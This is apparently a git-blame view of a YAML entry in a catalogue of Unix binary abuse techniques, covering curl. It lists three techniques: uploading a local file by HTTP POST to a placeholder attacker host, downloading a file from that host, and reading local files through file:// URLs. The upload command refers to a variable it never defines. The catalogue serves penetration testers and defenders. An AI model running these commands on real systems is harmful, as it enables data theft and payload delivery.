2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
|
|
|
upload:
|
2018-05-25 19:57:26 +02:00
|
|
|
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
2018-05-21 21:14:41 +02:00
|
|
|
code: |
|
2018-05-24 21:59:21 +02:00
|
|
|
URL=http://attacker.com/
|
2018-05-21 21:14:41 +02:00
|
|
|
LFILE=file_to_send
|
|
|
|
curl -X POST -d @$file_to_send $URL
|
|
|
|
download:
|
|
|
|
- description: Fetch a remote file via HTTP GET request.
|
2018-05-24 21:59:21 +02:00
|
|
|
code: |
|
|
|
|
URL=http://attacker.com/file_to_get
|
2018-06-04 19:53:35 +02:00
|
|
|
LFILE=file_to_save
|
2018-05-21 21:14:41 +02:00
|
|
|
curl $URL -o $LFILE
|
2018-06-10 10:49:59 +02:00
|
|
|
file-read:
|
|
|
|
- description: The file path must be absolute.
|
|
|
|
code: |
|
|
|
|
LFILE=/tmp/file_to_read
|
|
|
|
curl file://$LFILE
|
2018-05-25 01:10:39 +02:00
|
|
|
---
|